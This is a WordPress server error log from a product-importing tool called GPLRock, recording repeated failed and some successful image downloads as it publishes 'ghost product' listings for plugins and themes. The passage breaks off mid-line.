https://meldwp.com/wp-content/uploads/avatar--author-box-for-elementor-9771.webp for product avatar-author-box-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:26 UTC] GPLRock WARNING: Image download failed for product avatar-author-box-for-elementor. URL: https://meldwp.com/wp-content/uploads/avatar--author-box-for-elementor-9771.webp [06-Apr-2026 18:34:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: avatar-author-box-for-elementor [06-Apr-2026 18:34:26 UTC] GPLRock: Image download failed for product carousel-ultimate-advanced-carousel-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:28 UTC] GPLRock: Image download failed for product carousel-ultimate-advanced-carousel-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carousel-ultimate---advanced-carousel-wordpress-plugin-15130.webp for product carousel-ultimate-advanced-carousel-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:30 UTC] GPLRock: Image download failed for product carousel-ultimate-advanced-carousel-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:32 UTC] GPLRock: Image download failed for product carousel-ultimate-advanced-carousel-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carousel-ultimate---advanced-carousel-wordpress-plugin-15130.webp for product carousel-ultimate-advanced-carousel-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:34 UTC] GPLRock WARNING: Image download failed for product carousel-ultimate-advanced-carousel-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/carousel-ultimate---advanced-carousel-wordpress-plugin-15130.webp [06-Apr-2026 18:34:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carousel-ultimate-advanced-carousel-wordpress-plugin [06-Apr-2026 18:34:35 UTC] GPLRock: Image download failed for product address-google-autocomplete-in-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:37 UTC] GPLRock: Image download failed for product address-google-autocomplete-in-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/address-google-autocomplete-in-gravity-forms-30885.webp for product address-google-autocomplete-in-gravity-forms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:39 UTC] GPLRock: Image download failed for product address-google-autocomplete-in-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:41 UTC] GPLRock: Image download failed for product address-google-autocomplete-in-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/address-google-autocomplete-in-gravity-forms-30885.webp for product address-google-autocomplete-in-gravity-forms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:43 UTC] GPLRock WARNING: Image download failed for product address-google-autocomplete-in-gravity-forms. URL: https://meldwp.com/wp-content/uploads/address-google-autocomplete-in-gravity-forms-30885.webp [06-Apr-2026 18:34:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: address-google-autocomplete-in-gravity-forms [06-Apr-2026 18:34:43 UTC] GPLRock: Image download failed for product chameleon-audio-player-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:45 UTC] GPLRock: Image download failed for product chameleon-audio-player-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chameleon-audio-player-addon-for-wpbakery-page-builder-14068.webp for product chameleon-audio-player-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:48 UTC] GPLRock: Image download failed for product chameleon-audio-player-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:50 UTC] GPLRock: Image download failed for product chameleon-audio-player-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chameleon-audio-player-addon-for-wpbakery-page-builder-14068.webp for product chameleon-audio-player-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:52 UTC] GPLRock WARNING: Image download failed for product chameleon-audio-player-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/chameleon-audio-player-addon-for-wpbakery-page-builder-14068.webp [06-Apr-2026 18:34:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chameleon-audio-player-addon-for-wpbakery-page-builder [06-Apr-2026 18:34:54 UTC] GPLRock: Image download failed for product lead-manager-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:56 UTC] GPLRock: Image download failed for product lead-manager-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lead-manager-module-for-perfex-crm-24733.webp for product lead-manager-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:59 UTC] GPLRock: Image download failed for product lead-manager-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:35:01 UTC] GPLRock: Image download failed for product lead-manager-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:35:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lead-manager-module-for-perfex-crm-24733.webp for product lead-manager-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:35:03 UTC] GPLRock WARNING: Image download failed for product lead-manager-module-for-perfex-crm. URL: https://meldwp.com/wp-content/uploads/lead-manager-module-for-perfex-crm-24733.webp [06-Apr-2026 18:35:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lead-manager-module-for-perfex-crm [06-Apr-2026 18:36:25 UTC] GPLRock: Image downloaded successfully for product megafm-radio-station-podcaster-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b40228a.jpg [06-Apr-2026 18:36:25 UTC] GPLRock: Using pre-downloaded image for product megafm-radio-station-podcaster-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b40228a.jpg [06-Apr-2026 18:36:25 UTC] GPLRock: Ghost product published with image - Product ID: megafm-radio-station-podcaster-elementor-template-kit [06-Apr-2026 18:36:27 UTC] GPLRock: Image downloaded successfully for product meety-events-meetups-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6512da1.jpg [06-Apr-2026 18:36:27 UTC] GPLRock: Using pre-downloaded image for product meety-events-meetups-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6512da1.jpg [06-Apr-2026 18:36:27 UTC] GPLRock: Ghost product published with image - Product ID: meety-events-meetups-elementor-template-kit [06-Apr-2026 18:36:28 UTC] GPLRock: Image downloaded successfully for product medyplus-medical-clinic-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8432fbf.webp [06-Apr-2026 18:36:28 UTC] GPLRock: Using pre-downloaded image for product medyplus-medical-clinic-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8432fbf.webp [06-Apr-2026 18:36:28 UTC] GPLRock: Ghost product published with image - Product ID: medyplus-medical-clinic-template-kit [06-Apr-2026 18:36:29 UTC] GPLRock: Image downloaded successfully for product meduvid-medical-dental-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ef59d50.webp [06-Apr-2026 18:36:30 UTC] GPLRock: Using pre-downloaded image for product meduvid-medical-dental-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ef59d50.webp [06-Apr-2026 18:36:30 UTC] GPLRock: Ghost product published with image - Product ID: meduvid-medical-dental-clinic-elementor-template-kit [06-Apr-2026 18:36:31 UTC] GPLRock: Image downloaded successfully for product medup-medical-saas-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5520eae3.webp [06-Apr-2026 18:36:31 UTC] GPLRock: Using pre-downloaded image for product medup-medical-saas-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5520eae3.webp [06-Apr-2026 18:36:31 UTC] GPLRock: Ghost product published with image - Product ID: medup-medical-saas-elementor-template-kit [06-Apr-2026 18:36:32 UTC] GPLRock: Image downloaded successfully for product medo-medical-delivery-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d26bd88.webp [06-Apr-2026 18:36:32 UTC] GPLRock: Using pre-downloaded image for product medo-medical-delivery-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d26bd88.webp [06-Apr-2026 18:36:32 UTC] GPLRock: Ghost product published with image - Product ID: medo-medical-delivery-startup-elementor-template-kit [06-Apr-2026 18:36:34 UTC] GPLRock: Image downloaded successfully for product medkit-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fec41ac0.webp [06-Apr-2026 18:36:34 UTC] GPLRock: Using pre-downloaded image for product medkit-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fec41ac0.webp [06-Apr-2026 18:36:34 UTC] GPLRock: Ghost product published with image - Product ID: medkit-health-medical-elementor-template-kit [06-Apr-2026 18:36:35 UTC] GPLRock: Image downloaded successfully for product mediway-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f0e0628.webp [06-Apr-2026 18:36:35 UTC] GPLRock: Using pre-downloaded image for product mediway-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f0e0628.webp [06-Apr-2026 18:36:35 UTC] GPLRock: Ghost product published with image - Product ID: mediway-health-medical-elementor-template-kit [06-Apr-2026 18:36:37 UTC] GPLRock: Image downloaded successfully for product medive-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ddaed6d4.webp [06-Apr-2026 18:36:37 UTC] GPLRock: Using pre-downloaded image for product medive-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ddaed6d4.webp [06-Apr-2026 18:36:37 UTC] GPLRock: Ghost product published with image - Product ID: medive-health-medical-elementor-template-kit [06-Apr-2026 18:36:38 UTC] GPLRock: Image downloaded successfully for product marketa-digital-agency-business-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f239ce8.webp [06-Apr-2026 18:36:39 UTC] GPLRock: Using pre-downloaded image for product marketa-digital-agency-business-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f239ce8.webp [06-Apr-2026 18:36:39 UTC] GPLRock: Ghost product published with image - Product ID: marketa-digital-agency-business-services-elementor-template-kit [06-Apr-2026 18:37:28 UTC] GPLRock: Image downloaded successfully for product dokans-multitenancy-based-ecommerce-platform-saas (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4403845d.webp [06-Apr-2026 18:37:28 UTC] GPLRock: Using pre-downloaded image for product dokans-multitenancy-based-ecommerce-platform-saas: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4403845d.webp [06-Apr-2026 18:37:28 UTC] GPLRock: Ghost product published with image - Product ID: dokans-multitenancy-based-ecommerce-platform-saas [06-Apr-2026 18:37:28 UTC] GPLRock: Image downloaded successfully for product embed-any-document-plus-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99baf2ad.webp [06-Apr-2026 18:37:28 UTC] GPLRock: Using pre-downloaded image for product embed-any-document-plus-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99baf2ad.webp [06-Apr-2026 18:37:28 UTC] GPLRock: Ghost product published with image - Product ID: embed-any-document-plus-wordpress-plugin [06-Apr-2026 18:37:28 UTC] GPLRock: Image download failed for product woocommerce-hotel-reservation-booking-marketplace (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:30 UTC] GPLRock: Image download failed for product woocommerce-hotel-reservation-booking-marketplace (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-hotel-reservation--booking-marketplace-33311.webp for product woocommerce-hotel-reservation-booking-marketplace after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:34 UTC] GPLRock: Image download failed for product woocommerce-hotel-reservation-booking-marketplace (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:36 UTC] GPLRock: Image download failed for product woocommerce-hotel-reservation-booking-marketplace (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-hotel-reservation--booking-marketplace-33311.webp for product woocommerce-hotel-reservation-booking-marketplace after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-hotel-reservation-booking-marketplace. URL: https://meldwp.com/wp-content/uploads/woocommerce-hotel-reservation--booking-marketplace-33311.webp [06-Apr-2026 18:37:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-hotel-reservation-booking-marketplace [06-Apr-2026 18:37:38 UTC] GPLRock: Image download failed for product speedy-car-game-with-admob-and-leaderboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:40 UTC] GPLRock: Image download failed for product speedy-car-game-with-admob-and-leaderboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/speedy-car-game-with-admob-and-leaderboard-7556.webp for product speedy-car-game-with-admob-and-leaderboard after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:43 UTC] GPLRock: Image download failed for product speedy-car-game-with-admob-and-leaderboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:45 UTC] GPLRock: Image download failed for product speedy-car-game-with-admob-and-leaderboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/speedy-car-game-with-admob-and-leaderboard-7556.webp for product speedy-car-game-with-admob-and-leaderboard after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:47 UTC] GPLRock WARNING: Image download failed for product speedy-car-game-with-admob-and-leaderboard. URL: https://meldwp.com/wp-content/uploads/speedy-car-game-with-admob-and-leaderboard-7556.webp [06-Apr-2026 18:37:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: speedy-car-game-with-admob-and-leaderboard [06-Apr-2026 18:37:47 UTC] GPLRock: Image download failed for product talker-page-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:49 UTC] GPLRock: Image download failed for product talker-page-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talker--page-to-speech-plugin-for-wordpress-5366.webp for product talker-page-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:51 UTC] GPLRock: Image download failed for product talker-page-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:54 UTC] GPLRock: Image download failed for product talker-page-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/talker--page-to-speech-plugin-for-wordpress-5366.webp for product talker-page-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:37:56 UTC] GPLRock WARNING: Image download failed for product talker-page-to-speech-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/talker--page-to-speech-plugin-for-wordpress-5366.webp [06-Apr-2026 18:37:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: talker-page-to-speech-plugin-for-wordpress [06-Apr-2026 18:37:56 UTC] GPLRock: Image download failed for product woocommerce-product-image-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:37:58 UTC] GPLRock: Image download failed for product woocommerce-product-image-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-image-accordion-addon-for-elementor-13786.webp for product woocommerce-product-image-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:00 UTC] GPLRock: Image download failed for product woocommerce-product-image-accordion-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:02 UTC] GPLRock: Image download failed for product woocommerce-product-image-accordion-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-image-accordion-addon-for-elementor-13786.webp for product woocommerce-product-image-accordion-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:04 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-image-accordion-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-image-accordion-addon-for-elementor-13786.webp [06-Apr-2026 18:38:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-image-accordion-addon-for-elementor [06-Apr-2026 18:38:05 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-vector-card (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:07 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-vector-card (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---vector-card-21203.webp for product wpbakery-page-builder-add-on-vector-card after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:09 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-vector-card (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:11 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-vector-card (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---vector-card-21203.webp for product wpbakery-page-builder-add-on-vector-card after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:13 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-vector-card. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---vector-card-21203.webp [06-Apr-2026 18:38:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-vector-card [06-Apr-2026 18:38:13 UTC] GPLRock: Image download failed for product lottie-image-animation-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:15 UTC] GPLRock: Image download failed for product lottie-image-animation-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lottie-image-animation-for-wpbakery-page-builder-3916.webp for product lottie-image-animation-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:18 UTC] GPLRock: Image download failed for product lottie-image-animation-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:20 UTC] GPLRock: Image download failed for product lottie-image-animation-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lottie-image-animation-for-wpbakery-page-builder-3916.webp for product lottie-image-animation-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:22 UTC] GPLRock WARNING: Image download failed for product lottie-image-animation-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/lottie-image-animation-for-wpbakery-page-builder-3916.webp [06-Apr-2026 18:38:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lottie-image-animation-for-wpbakery-page-builder [06-Apr-2026 18:38:22 UTC] GPLRock: Image download failed for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:24 UTC] GPLRock: Image download failed for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elespare-pro---news-magazine-and-blog-elements--addons-for-elementor-with-header-27960.webp for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:26 UTC] GPLRock: Image download failed for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:28 UTC] GPLRock: Image download failed for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elespare-pro---news-magazine-and-blog-elements--addons-for-elementor-with-header-27960.webp for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:30 UTC] GPLRock WARNING: Image download failed for product elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder. URL: https://meldwp.com/wp-content/uploads/elespare-pro---news-magazine-and-blog-elements--addons-for-elementor-with-header-27960.webp [06-Apr-2026 18:38:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elespare-pro-news-magazine-and-blog-elements-addons-for-elementor-with-header-footer-builder [06-Apr-2026 18:38:31 UTC] GPLRock: Image download failed for product woocommerce-geniki-courier-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:33 UTC] GPLRock: Image download failed for product woocommerce-geniki-courier-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-geniki-courier-voucher--label-21833.webp for product woocommerce-geniki-courier-voucher-label after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:35 UTC] GPLRock: Image download failed for product woocommerce-geniki-courier-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:37 UTC] GPLRock: Image download failed for product woocommerce-geniki-courier-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:38:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-geniki-courier-voucher--label-21833.webp for product woocommerce-geniki-courier-voucher-label after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:38:39 UTC] GPLRock WARNING: Image download failed for product woocommerce-geniki-courier-voucher-label. URL: https://meldwp.com/wp-content/uploads/woocommerce-geniki-courier-voucher--label-21833.webp [06-Apr-2026 18:38:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-geniki-courier-voucher-label [06-Apr-2026 18:39:22 UTC] GPLRock: Image download failed for product vegfirm-grocery-supermarket-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:24 UTC] GPLRock: Image download failed for product vegfirm-grocery-supermarket-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vegfirm---grocery--supermarket-wordpress-theme-11253.webp for product vegfirm-grocery-supermarket-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:27 UTC] GPLRock: Image download failed for product vegfirm-grocery-supermarket-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:29 UTC] GPLRock: Image download failed for product vegfirm-grocery-supermarket-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vegfirm---grocery--supermarket-wordpress-theme-11253.webp for product vegfirm-grocery-supermarket-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:31 UTC] GPLRock WARNING: Image download failed for product vegfirm-grocery-supermarket-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vegfirm---grocery--supermarket-wordpress-theme-11253.webp [06-Apr-2026 18:39:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vegfirm-grocery-supermarket-wordpress-theme [06-Apr-2026 18:39:31 UTC] GPLRock: Image download failed for product christian-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:33 UTC] GPLRock: Image download failed for product christian-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/christian---church-wordpress-theme-22823.webp for product christian-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:35 UTC] GPLRock: Image download failed for product christian-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:37 UTC] GPLRock: Image download failed for product christian-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/christian---church-wordpress-theme-22823.webp for product christian-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:39 UTC] GPLRock WARNING: Image download failed for product christian-church-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/christian---church-wordpress-theme-22823.webp [06-Apr-2026 18:39:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: christian-church-wordpress-theme [06-Apr-2026 18:39:40 UTC] GPLRock: Image download failed for product cosion-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:42 UTC] GPLRock: Image download failed for product cosion-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosion---business-consulting-wordpress-theme-31635.webp for product cosion-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:44 UTC] GPLRock: Image download failed for product cosion-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:46 UTC] GPLRock: Image download failed for product cosion-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:39:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosion---business-consulting-wordpress-theme-31635.webp for product cosion-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:39:48 UTC] GPLRock WARNING: Image download failed for product cosion-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cosion---business-consulting-wordpress-theme-31635.webp [06-Apr-2026 18:39:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cosion-business-consulting-wordpress-theme [06-Apr-2026 18:39:48 UTC] GPLRock: Image download 